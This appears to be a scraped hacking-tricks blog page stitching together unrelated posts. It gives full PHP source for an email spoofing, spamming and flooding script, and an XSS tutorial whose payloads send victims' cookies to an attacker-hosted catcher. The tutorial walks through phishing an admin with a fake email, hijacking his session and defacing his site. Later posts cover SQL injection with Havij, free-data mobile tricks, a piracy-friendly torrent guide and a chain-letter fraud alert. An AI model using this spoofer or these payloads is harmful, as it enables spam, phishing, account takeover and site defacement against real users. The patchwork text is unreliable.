MAKE YOUR OWN EMAIL SPOOFING SERVICE

1. First of all you need to find a free hosting service that supports PHP and SendMail. Here is one that works perfect, and without ads: x10hosting.com. Create an account there.


2. Now open notepad and paste the PHP code written at bottom of the page.

3. Save it everywhere u want as mail.php, then upload it in your host you created (ripway.com) via FTP.

4. Now we are done. Just go at ripway.com.yourname/mail.php, and start sending your fake emails.

Why sending anonymous emails is important:
Anonymously report sensitive information to the media
Send crime tips to law enforcement agencies anonymously
Report wrongdoing or theft at the workplace
Voice concerns to school principals anonymously
Report child or any other abuse
Initiate an anonymous chat discussion
Share suspicions regarding a friend or loved one

The PHP CODE :

<?
/*
(C) NOmeR1
*/
?>
<title>Sender Anonym Email :: FLoodeR :: SpameR</title>
<?
//
error_reporting (0);
if(!set_time_limit(0)) {
$limit = false;
} else {
set_time_limit(0);
ignore_user_abort(1);
$limit = true;
}

$log = 'log.txt'; // Log file

ini_set('max_execution_time', '0');

?>
set_time_limit(0) = <?if($limit)echo('<font color=Green>On</font>');else
echo('<font color=Red>Off</font> (Working time is limited with the current settings of the server)');?><br>
<?

$ip = getenv('REMOTE_ADDR');
if($_GET['mail'] == '1' || $_GET['mail'] == '2' || $_GET['mail'] == '3')
{

$_POST['to'] = stripslashes($_POST['to']);
$_POST['msg'] = stripslashes($_POST['msg']);
$_POST['from'] = stripslashes($_POST['from']);
$_POST['subject'] = stripslashes($_POST['subject']);

if($_POST['to'] && $_POST['msg'] && $_POST['from'] && $_POST['tipe'])
{
$headers = "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/".$_POST['tipe']."; charset=windows-1251\r\n";
$headers .= "From: ".$_POST['from']."\n";
if($_GET['mail'] == '1')
{
mail($_POST['to'], $_POST['subject'], $_POST['msg'], $headers) or die('Cannot send the message');
}
elseif($_GET['mail'] == '2')
{
$_POST['to'] = explode("\n",$_POST['to']);
foreach($_POST['to'] as $poluchatels)
{
mail($poluchatels, $_POST['subject'], $_POST['msg'], $headers) or die('Cannot send the message');
}
}
elseif($_GET['mail'] == '3')
{
if(preg_match('/[0-9]+/',$_POST['kol']))
{
for($i=0;$i<$_POST['kol'];$i++)
{
mail($_POST['to'], $_POST['subject'], $_POST['msg'], $headers) or die('Cannot send the message');
sleep(1);
}
}
else
{
echo('Incorrect (or not entered) number of messages');
}
}
$f = fopen($log,'a');
fwrite($f,'Message sent &'.$_POST['msg'].'& with subject "'.$_POST['subject'].'" for "'.$_POST['to'].'" from IP - "'.$ip."\"\r\n");
fclose($f);
echo('<center><b><font color="green">Message succesfully sent</font></b></center>');
}
else
{
?>
<form style="width:350px" method='post'>
<?
if($_GET['mail'] == '1' || $_GET['mail'] == '3')
{
echo("Receiver &nbsp;<input type='text'name='to'><br>");
}
?>
Sender <input type='text' name='from'><br>
Subject &nbsp;<input type='text' name='subject'><br>
<?
if($_GET['mail'] == '3')
{
echo("Amount of messages <input type='text' name='kol'><br>");
}
?>
<br>
htm -> <input type='radio' checked='checked' tabindex='1' name='tipe' value='html'> :: <input type='radio' name='tipe' value='plain'><- text<br>
<?
if($_GET['mail'] == '2')
{
echo("Receivers<br><textarea name='to' rows='10' cols='30'>admin@fbi.org
admin@cia.org
admin@whitehouse.org</textarea>");
}
?>
<br>Message<br>
<textarea name='msg' rows='10' cols='30'></textarea><br><br><input type='submit'>
</form>
<?
}
} else {
?><br>
<a href='<?=$_SERVER['PHP_SELF']?>?mail=1'>Send simple message</a><br>
<a href='<?=$_SERVER['PHP_SELF']?>?mail=2'>Spam</a><br>
<a href='<?=$_SERVER['PHP_SELF']?>?mail=3'>Flood</a><br>
<?
}

XSS Tutorial

Hi XSS is in 2 ways, Persistent and Non-Persistent type.

For XSS we will use something called a cookie catcher.
Question will be that why we would need someone else's cookie?
The answer is that we can change our browser's cookies to login as them!!! So lets call it Session Hijacking...

First go to a free hosting site like http://www.110mb.com or other php hosting sites and register there. Then download this cookie catcher and upload it.


Cookie Catcher: DOWNLOAD

What does the cookie catcher do?
It grabs the user's:



  • Cookies
  • IP
  • Referral link which what page it got to that link
  • Time and Date

Get Vulnerable sites:

Ok first we need sites that are vulnerable to XSS so it will work on them.
To test it we will need to add a code after the link.
I will use this site that many of you probably saw it before.
DOWNLOAD

Now for testing if a site is vuln or not you can add these codes:
Code:
"><script>alert(document.cookie)</script>
Code:
'><script>alert(document.cookie)</script>
Code:
"><script>alert("Test")</script>
Code:
'><script>alert("Test")</script>
Or a new one which i found out myself which you can inject HTML:
Code:
"><body bgcolor="FF0000"></body>
Code:
"><iframe src="www.google.com" height=800 width=800 frameborder=1 align=center></iframe>

Then if we see a java script popup like this:
[Image: i83028_popup.bmp]
Or if you used my testing and you saw the page's background go black or a page of google opens in that site means its vulnerable to XSS attacks.

In the end, if your site is http://www.example.com the link to test it would be: http://www.example.com/index.php?id="><script>alert(document.cookie)</script>


Persistent XSS:

In this method we will grab the victim's cookies with no suspection and completely stealth.
Now assume we have a forum which has HTML enabled or a site which has a comment page which is vulnerable to XSS.
Ok now lets go to this site: LINK
Now test and see if the XSS vulnerable test's work on it.
It does!!! And your getting one of the vulnerability's symptoms. So now lets try to grab it's cookies. If there is a box to type and submit it add this:
Code:
<script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>
and submit that post in the forum or the comment box also its good to add something before adding the code like: hey i got a problem logging in???
so they wont suspect you...

Refresh the page, now go to the newly created page, in the same directory as you saved your cookie catcher .php search for cookies.html which is a new file that show you the cookies. like if your cookie catcher link would be:
http://www.example.com/cookie catcher.php
the container of the cookies would be:
http://www.example.com/cookies.html

Now visit cookies.html and you would see the session of that cookie! 
PS: the site i used doesn't support cookies so you can use: LINK for cookie supporting.

Now there is another way for a cookie grabbing drive by, add this code and post it:
Code:
<iframe frameborder=0 height=0 width=0 src=javascript:void(document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie)</iframe>
Then post it in the forum or the comment box.
Now this will open a iframe in the page which will allow you to have the same page in that website. If you don't know about iframes make a new html file in your computer and just do a 

<iframe src="www.google.com"></iframe> and you will understand iframes more...

ofc the site Needs to have cookies supported! a blank javascript means you need to go to another site.


Non-Persistent XSS:


Ok in this method we will make the victim admin go to our link. First we will pick a XSS vuln site. For this method we will need a search.php which that page is vuln to XSS and has cookies in that page. In the vuln search.php in the textbox for the word to search for type:
Code:
<script>alert(document.cookie)</script>

and click the search button. If you see a javascript popup means its vuln to Non-Persistent XSS attack. Ok now we will do something similar.
I will use this link for this method: http://adf.ly/TeZV
Now in front of the search.php?search= add this:
Code:
"><script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>
Now go to LINK and shrink the whole page's link. Try to find a site administrator's E-mail in that vuln website and send a Fake Mail from a online fake mailer like this one: 
FAKE MAILER

Now in the body just tell something fake like: Hey i found a huge bug in your website! and give him the shrinked link of the search.php which you added the code in front of it to him. so the Tinyurl will mask it and once he goes to the link you will see his cookies in your cookies.html and he will just be redirected to the link in your cookies catcher. No matter what he does and changes his password you can still login as him.


Session Hijacking:

Ok now you have the admin's cookies either way, so we need to edit our own browser's cookies. First go to that page's admin login or its main page and delete ALL of your cookies from that page. Now go in your cookies.html page and copy everything in front of the Cookie: in a note opened Notepad. The ; separates cookies from each other so first copy the code before the ; .
Now go in that vuln website and clear the link. instead add this:
Code:
Javascript:void(document.cookie="")
or for an example:
Code:
Javascript:void(document.cookie="__utma=255621336.1130089386.1295743598.1305934653.1305950205.86")

Then visit the link. Do this with all of the cookies and refresh the page. And wham!!! your logged in as administrator.
So now go in your admin panel and upload your deface page.

Hack the website in 5 steps

hack the website using HAVIJ TOOL

first find the vuln. target and past the link in havij

1 STEP>>>


[Image: 17699305.png]

NOW press the analyse button it will analyze the link and if the target is vulnerable then it's give you the message 

TARGET IS VULNERABLE:D

and after you'll get that target is vulnerable then 
you'll get the database name 

2 STEP>>>

[Image: 58276798.png]

now you've to press 

"TABLE " button as image show

3 STEP>>>

[Image: 68749771.png]

now you can see the table name

after choose the table which is contain username and password

see in the image

press get column

4 STEP>>>

[Image: 51558141.png]

now you can get the column name !!!

click on column and press 

"DATA" BUTTON you can get the username and password
but before that you must select the column

5 STEP>>>

[Image: 88184291.png]

so here we can see both method of sql injection manually and automated tools...



DOWNLOAD
Havij 1.10
Havij 1.12 
Havij 1.13
Havij 1.14

How to increase Utorrent Download Speed


The program has received consistently good reviews for its feature set, performance, stability, and support for older hardware and versions of Windows. A report showed that
µTorrent is the second most popular BitTorrent client (after the Chinese Xunlei).

It is available for Microsoft Windows and Mac OS X. A
µTorrent Server is available for Linux. All versions are written in C++. Its been under development since year 2005, I noticed a lot of people download movies, softwares and other illegal patched stuff from torrent websites, Therefore i am posting a trick that how can we increase the downloading speed of µTorrent, Surely! this time also i will give information with the help of pictures and guide



Tutorial for How to Speed Up uTorrent :


You can download µTorrent from here. So, lets start the smart guide! I am going to show you that how can we tweak µTorrent speed of downloading inorder to get better and time saving results.

1) Open µTorrent, And go to Options > Preferences and do what i did ! (check also what i checked)




2) Now open Bandwidth, and do what i did in screen shot below !




3) Now, Move on to BiTorrent and do what i did in screen shot below! (Check whatever i have checked)


4) Now move on to the Queueing , and follow exactly what i did in screen shot !




5) After that, Go to Advanced, and follow me !




6) After that click apply, and do this under Logger !




7) Last step, Right click the downloaded torrent and do this: right click on the file which is being downloaded, and go to Bandwidth Allocation > High , After that you are done.


Note: Inorder to get best results always select torrents with good number of seeds.

SUBSCRIBE BY SMS TO GET LATEST TRICKS TO U R MOBILE

TO  SUBSCRIBE  FOR FREE

TYPE
-------------------------
ON  MUNEERHACK

           TO

    9870807070



METHOD 2
http://labs.google.co.in/smschannels/subscribe/muneerhack

U CAN SUBSCRIBE VIA GOOGLE












Security Alert: Fraud Calls

Hello Friends,
If you receive a phone call on your Mobile from any person saying that they are checking your mobile line, and you have to press #90 or #09 or any other number. End this call immediately without pressing any numbers. Friends there is a fraud company using a device that once you press #90 or #09 they can access your SIM card and make calls at your expense. Forward this message to as many friends as u can, to stop it. This information has been confirmed by both Motorola and Nokia. There are over 3 million affected mobile phones.


LATEST AIRTEL 3G MOBILE OFFICE TRICKS USING OPERA MINI


After a long time back we are presenting you a 100% working airtel free gprs browsing and downloading hack.This trick has tested on my mobile Motorola l9 and working successfully in Tamil Nadu.In addition with this we are also presenting the Opera Mini 4.2 Super Moded Version in .jar format.You may ask what are the special features in it?We have listed some of its special features:
1.Download Manager:
This browser supports the download manager which has a capability to Pause/Resume download support.You can also set the Download Block Size in it.
2.File Manager:
Through this file Manager Option you can play audio & video files,view the photos&pictures and many more.
3.Copy & Paste option:
You can copy as well as paste the text even webpage also.
4.Special Screenshot feature in the .jar version.
5.View hidden link just by placing the cursor on the particular link and view the the hidden url like in the PC browser.
6.Lock opera mini using password.
7.It can be possible to edit the user agent and the server option.
8. Multi-window browsing without closing anyone tab just like an PC experience.
9.Backlight brightness can be controlled(if your mobile supports)
10.We can browse the internet without paying singly penny rupees and also No Balance Restriction.
1.Now set the default Web settings as Airtel Mobile Ofifce not Airtel Live.
2.Keep balance as much you wish(but it is not recommended keep below Rs0.60)
3.First initialize the given opera mini 4.2,you may charged Rs0.30 for Initialization.
4.After initialization close the application then re-open it.
5.Now you can browse and download unlimited as much you can.No balance deduction & no balance restriction.Checked on my mobile Motorola L9.
6.To download the moded opera mini Click Here To Download!!!!!!!1
7.The credit of this trick goes to the the owner who found it.For more reference please Refer Our Privacy Policy.



WORKS IN SOME STATES.......ONLY

Free Unlimited 3G Service on Tata Docomo

Are you tired of using the low speed 2G service? I know your answer is ‘YES’. We all want to lay our hands on the latest high speed 3G service which gives a  download speed of 500 kbps to 1000 kbps. Today I will show a trick using which you can use unlimited 3G service for free.

Requirements

  1. Tata Docomo SIM Card with a balance of more than Rs. 1
  2. 3G enabled cellphone

Steps

  1. Create New Access Point Using Below Configuration and restart your cellphone.
    • Name : Tata Docomo or any
    • Access Point ( APN ) – tata.docomo.dive.in
    • Homepage : www.google.com or any
    • Proxy : 202.87.41.147
    • Proxy Port : 8080
    • Username : leave blank
    • Password : leave blank
  2. Download Operamini 4.2 Handler Browser
  3. Open your Opera mini handler and do the following changes in the Setiings:
    • Set Divein Settings as Default Settings For Opera Mini
    • Set http in Custom Field in your Opera Mini handler
    • Set Socket Server to http://203.115.112.5.server4.operamini.com OR http://10.124.72.171.server4.operamini.com
    • Keep Proxy Type as blank (Don’t Enter Anything in Proxy Server Field)
  4. Done!! Now use your free unlimited 3G service. Enjoy!!

Google hacking For Penetration

Author(s): Brian Jacques
Publisher: Syngress 2007
Date     : 2007
Pages    : 560
Format   : pdf
OCR      : 
Quality  : 
Language : English
ISBN-10  : 1597491764

DESCRIPTION:-
oogle Hacking for Penetration Testers: vol. 2
Publisher: Syngress 2007 | 560 Pages | ISBN: 1597491764 | PDF | 12 MB

. Learn Google Searching Basics
Explore Google's Web-based Interface, build Google queries, and work with Google URLs.
. Use Advanced Operators to Perform Advanced Queries
Combine advanced operators and learn about colliding operators and bad search-fu.
. Learn the Ways of the Google Hacker
See how to use caches for anonymity and review directory listings and traversal techniques.
. Review Document Grinding and Database Digging
See the ways to use Google to locate documents and then search within the documents to locate information.
. Understand Google's Part in an Information Collection Framework
Learn the principles of automating searches and the applications of data mining.
. Locate Exploits and Finding Targets
Locate exploit code and then vulnerable targets.
. See Ten Simple Security Searches
Learn a few searches that give good results just about every time and are good for a security assessment.
. Track Down Web Servers
Locate and profile web servers, login portals, network hardware and utilities.
. See How Bad Guys Troll for Data
Find ways to search for usernames, passwords, credit card numbers, social security numbers, and other juicy information.
. Hack Google Services
Learn more about the AJAX Search API, Calendar, Blogger, Blog Search, and more.